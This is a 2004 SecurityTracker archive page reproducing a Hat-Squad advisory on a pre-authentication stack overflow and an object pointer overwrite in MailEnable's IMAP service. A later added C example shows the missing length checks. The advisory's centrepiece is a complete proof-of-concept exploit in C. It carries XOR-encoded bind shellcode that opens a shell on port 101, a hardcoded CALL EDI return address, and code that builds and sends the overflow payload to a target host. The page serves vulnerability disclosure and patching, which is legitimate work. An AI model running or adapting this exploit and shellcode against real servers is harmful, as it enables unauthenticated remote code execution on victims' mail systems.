SecurityTracker Archives
Category:   Application (E-mail Server)  >   MailEnable
Vendors:   MailEnable Pty. Ltd.
MailEnable Stack Overflow and Pointer Overwrite in IMAP Service Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1012327
SecurityTracker URL:  http://securitytracker.com/id/1012327
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 25 2004
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): Professional Edition v1.52, MailEnable Enterprise Edition v1.01
Description:   Hat-Squad Security Team reported two vulnerabilities in MailEnable's IMAP service. A remote user can execute arbitrary code.

It is reported that a remote user can trigger a stack-based buffer overflow or an object pointer overwrite to execute arbitrary code on the target system.

A remote user can send a specially crafted command in the following format to trigger the buffer overflow:

<identifier tag 3bytes> <Ax8198> <ret_addr>

The original advisory and demonstration exploit code are available at:

http://www.hat-squad.com/en/000102.html

Nima Majidi is credited with discovering this flaw.

The vendor was notified on November 24, 2004.

Impact:   A remote user can execute arbitrary code on the target system with the privileges of the IMAP service.
Solution:   The vendor has issued a fix, available at:

http://mailenable.com/hotfix.asp

Vendor URL:  www.mailenable.com/
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003), Windows (XP)

Message History:   None.


Source Message Contents

Subject:  Hat-Squad Advisory: Remote buffer overflow in MailEnable IMAP service


Hi,

Please see the attached security advisory for MailEnable vulnerabilities with
POC included.

Thanks,

Hat-Squad Security Team





Hat-Squad Security Team Advisory
http://www.hat-squad.com

Product: MailEnable Mail Server
Vendor Url: http://www.mailenable.com
Version: MailEnable Professional Edition v1.52, MailEnable Enterprise Edition v1.01
Vulnerability: Remote buffer overflow in IMAP service 
Release Date: 26 November, 2004

Vendor Status: 
Informed on 24 November 2004
Response: 24 November 2004
Fixed on 25 November 2004


Overview: 

MailEnable's Mail Server software provides an enterprise messaging platform for Microsoft Windows NT/2000/XP/2003 systems.
The MailEnable Professional IMAP service allows users to have server-hosted folders and subfolders.
Two vulnerabilities were discovered by the Hat-Squad Team in MailEnable's IMAP service: a stack-based buffer overflow
and an object pointer overwrite. Both can lead to remote execution of arbitrary code.
  
Problem: 

1. Stack based Buffer Overflow:

Due to a missing boundary check in the IMAP service, sending a client command of more than
8198 bytes causes a stack buffer overflow. This vulnerability can be triggered before any kind of authentication.

Sample Request:  

<identifier tag 3bytes> <Ax8198> <ret_addr>  

As a result, EIP is overwritten with ret_addr.

Proof of Concept Exploit by class101 (class101@hat-squad.com):

-----------------------------------------------------------------------------------------
/*

Mailenable Pro v1.52, IMAP Service, Remote Buffer Overflow Exploit by 
class101(class101@hat-squad.com)

Tested on: 
	Win2k SP4 Pro    English  
	Win2k SP4 Pro    French   
	Win2k SP4 Server English 

Greetz: Arashy, Homi 	   
*/

#include <winsock2.h>
#include <iostream>   // the original used the pre-standard "fstream.h"; <iostream> provides cout/endl on current compilers

using namespace std;

#pragma comment(lib, "ws2_32")

//BIND shellcode port 101, XORed 0x88, thanx HDMoore. 

char scode[] ="\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";



static char payload[10000];

char magikcll[]="\x7a\x8c\x01\x10"; //CALL EDI - MEAISP.dll - "Universal"

void usage(char* us);
WSADATA wsadata;
void ver();

int main(int argc,char *argv[])
{
	ver();
	if ((argc<2)||(argc>3)){usage(argv[0]);return -1;}	
	if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){
		cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
	int ip=htonl(inet_addr(argv[1])), sz, port, sizeA, a;
	
	if (argc==3){port=atoi(argv[2]);}
	else port=143;
	char *target;
	target=magikcll;
	SOCKET s;
	struct fd_set mask;
	struct timeval timeout; 
	struct sockaddr_in server;
	s=socket(AF_INET,SOCK_STREAM,0);if (s==INVALID_SOCKET){
	cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();
	return -1;}
		
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=htonl(ip);
	server.sin_port=htons(port);
	WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
	timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
	switch(select(s+1,NULL,&mask,NULL,&timeout))
	{
		case -1: {
			cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);
			return -1;
		}
		case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);
			return -1;}
		default:
		if(FD_ISSET(s,&mask))
		{
			cout<<"[+] connected, constructing the payload..."<<endl;
			Sleep(2000);
			sizeA=8202-sizeof(scode);
			sz=3+8198+4;
			memset(payload,0,sizeof(payload));
			strcat(payload,"\x41\x41\x41");
			strcat(payload,scode);
			for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
			strcat(payload,target);
			strcat(payload,"\r\n");
		    if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { 
				cout<<"[+] sending error, the server prolly rebooted."<<endl;
				return -1;}
			Sleep(1000);
			cout<<"[+] size of payload: "<<sz<<endl;			
			cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
			return 0;
		}
	}
	closesocket(s);
	WSACleanup();
	return 0;
}


void usage(char* us) 
{  
	cout<<"USAGE: me_expl.exe <Target> <Port>\n"<<endl;
	cout<<"NOTE:                               "<<endl;
	cout<<"      The port 143 is default if no port are specified"<<endl;
	cout<<"      The exploit bind a shellcode to the port 101"<<endl;
	return;
} 
void ver()
{	
cout<<""<<endl;
cout<<""<<endl;
cout<<"       ============================================================"<<endl;
cout<<"        ======MailEnable, Pro Mail Server for Windows <= v1.52======="<<endl; 
cout<<"        ========IMAP Service, Remote Buffer Overflow Exploit========="<<endl;
cout<<"        ======coded by class101=============[Hat-Squad.com 2004]====="<<endl;
cout<<"       ============================================================"<<endl;
cout<<""<<endl;
}

-----------------------------------------------------------------------------------------

2. Object Pointer Overwrite:

MailEnable fails to check the length of the request sent to the IMAP service
before doing any command processing. Sending more than 432 bytes
to MEIMAP and then terminating the connection causes a pointer overwrite;
during execution, the EAX, ECX and EDX registers are overwritten.
Part of the vulnerable code follows:

0040E9E0  /$ 55             PUSH EBP
0040E9E1  |. 8BEC           MOV EBP,ESP
0040E9E3  |. 51             PUSH ECX
0040E9E4  |. 894D FC        MOV DWORD PTR SS:[EBP-4],ECX
0040E9E7  |. 8B45 FC        MOV EAX,DWORD PTR SS:[EBP-4]
0040E9EA  |. 8338 00        CMP DWORD PTR DS:[EAX],0
0040E9ED  |. 74 10          JE SHORT MEIMAPS.0040E9FF
0040E9EF  |. 8B4D FC        MOV ECX,DWORD PTR SS:[EBP-4]
0040E9F2  |. 8B11           MOV EDX,DWORD PTR DS:[ECX]	<-------- Exception
0040E9F4  |. 8B45 FC        MOV EAX,DWORD PTR SS:[EBP-4]
0040E9F7  |. 8B08           MOV ECX,DWORD PTR DS:[EAX]
0040E9F9  |. 8B01           MOV EAX,DWORD PTR DS:[ECX]
0040E9FB  |. 52             PUSH EDX
0040E9FC  |. FF50 04        CALL DWORD PTR DS:[EAX+4]		<------- Method Call
0040E9FF  |> 8BE5           MOV ESP,EBP
0040EA01  |. 5D             POP EBP
0040EA02  \. C3             RETN

The actual code should be:
.......
char *buff;
...
strcpy(buff, input);          <--- obj pointer overwrite
...
vuln_function(SomeClass *obj, char *input) {
    ...
    obj->someMethod();
    ...
}

"call dword ptr ds:[EAX+4]" corresponds to "obj_arg->someMethod();". This call instruction could be used for
exploitation by brute-forcing the input buffer address in the stack area.
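Both problems above come down to the same missing control: the request length is never checked before the data is copied and the command is processed. The C below is an added illustration written for this page, not MailEnable's code and not part of the Hat-Squad advisory. It shows the two checks a server needs, a line-framing limit enforced before any command parsing (section 1) and a bounded copy into the per-command buffer that sits next to the object pointer (section 2), and it validates the pointer before the indirect call that the listing shows as CALL DWORD PTR DS:[EAX+4]. The names (check_imap_line, session_set_arg, handle_line, struct imap_session) and the limits MAX_IMAP_LINE and ARG_CAPACITY are assumptions chosen to match the byte counts the advisory reports; the sample lines are constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Limits are assumptions for this illustration: the advisory reports that
 * commands over 8198 bytes overflow the IMAP stack buffer and that more
 * than 432 bytes clobber an object pointer. */
#define MAX_IMAP_LINE 8198u   /* assumed line capacity, CRLF included */
#define ARG_CAPACITY   432u   /* assumed capacity of the per-command argument buffer */

enum line_status { LINE_OK = 0, LINE_TOO_LONG = 1, LINE_NO_CRLF = 2 };

/* Framing check that runs before any command parsing. A client line that
 * does not fit the buffer is rejected here, so no later copy can overrun. */
enum line_status check_imap_line(const char *buf, size_t len)
{
    if (len > MAX_IMAP_LINE)
        return LINE_TOO_LONG;
    if (len < 2 || buf[len - 2] != '\r' || buf[len - 1] != '\n')
        return LINE_NO_CRLF;
    return LINE_OK;
}

struct command_handler {
    const char *name;
    int (*run)(const char *arg);
};

/* Layout mirroring the advisory's pseudocode: a fixed argument buffer
 * followed by the object pointer that is later used for a method call. */
struct imap_session {
    char arg[ARG_CAPACITY];
    struct command_handler *obj;
};

/* The advisory's vulnerable pattern is strcpy(buff, input) with no length
 * check. This bounded replacement refuses input that would not fit, so the
 * bytes after arg (including obj) are never written. Returns 0 or -1. */
int session_set_arg(struct imap_session *s, const char *input, size_t len)
{
    if (len >= sizeof s->arg)
        return -1;
    memcpy(s->arg, input, len);
    s->arg[len] = '\0';
    return 0;
}

static int capability(const char *arg)
{
    (void)arg;
    return 1;  /* constructed stand-in for a real command implementation */
}

/* Validates framing, then length, then the object pointer, and only then
 * performs the indirect call. Returns the handler result, or a negative
 * code naming the stage that rejected the line. */
int handle_line(struct imap_session *s, const char *line, size_t len)
{
    if (check_imap_line(line, len) != LINE_OK)
        return -1;
    /* drop CRLF, then the 3-byte tag and space from the advisory's sample request */
    size_t body = len - 2;
    const char *arg = body > 4 ? line + 4 : line;
    size_t arg_len = body > 4 ? body - 4 : 0;
    if (session_set_arg(s, arg, arg_len) != 0)
        return -2;
    if (s->obj == NULL || s->obj->run == NULL)
        return -3;
    return s->obj->run(s->arg);
}

/* Constructed inputs: a benign line, a line of the size the advisory says
 * overflowed the stack buffer, and one that fits the line limit but not the
 * argument buffer. Returns 1 when every check behaved as intended. */
int run_demo(void)
{
    struct command_handler cap = { "CAPABILITY", capability };
    struct imap_session s;
    memset(&s, 0, sizeof s);
    s.obj = &cap;

    const char good[] = "a01 CAPABILITY\r\n";
    int ok = handle_line(&s, good, sizeof good - 1) == 1;

    /* 3-byte tag, space, 8198 'A's, CRLF: 8204 bytes, over the line cap */
    size_t big_len = 3 + 1 + 8198 + 2;
    char *big = malloc(big_len + 1);
    memset(big, 'A', big_len);
    memcpy(big, "a02 ", 4);
    memcpy(big + big_len - 2, "\r\n", 2);
    big[big_len] = '\0';
    int rejected_line = handle_line(&s, big, big_len) == -1;

    /* 3-byte tag, space, 500 'B's, CRLF: within the line cap, over ARG_CAPACITY */
    char mid[3 + 1 + 500 + 2 + 1];
    memset(mid, 'B', sizeof mid);
    memcpy(mid, "a03 ", 4);
    memcpy(mid + sizeof mid - 3, "\r\n", 2);
    mid[sizeof mid - 1] = '\0';
    int rejected_arg = handle_line(&s, mid, sizeof mid - 1) == -2;
    int pointer_intact = s.obj == &cap;  /* the object pointer was never touched */

    free(big);
    return ok && rejected_line && rejected_arg && pointer_intact;
}

int main(void)
{
    printf("checks %s\n", run_demo() ? "held" : "failed");
    return 0;
}
```

The order of the checks is the point: the framing limit rejects an oversized line before any parsing touches it, the bounded copy rejects an argument before it can spill into the adjacent pointer, and the NULL test on the handler is the last line of defence, not the first. The listing in the advisory has only that final test (CMP DWORD PTR DS:[EAX],0), which cannot distinguish a valid pointer from one overwritten with attacker bytes.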

Vendor Response: 

MailEnable has released a patch for these vulnerabilities: http://mailenable.com/hotfix.asp


Credits: 
Discovery: Nima Majidi (nima_majidi@hat-squad.com)
Additional Research: idespinner(idespinner@hat-squad.com) and class101 (class101@hat-squad.com)

The original advisory can be found at:
http://www.hat-squad.com/en/000102.html

Copyright 2019, SecurityGlobal.net LLC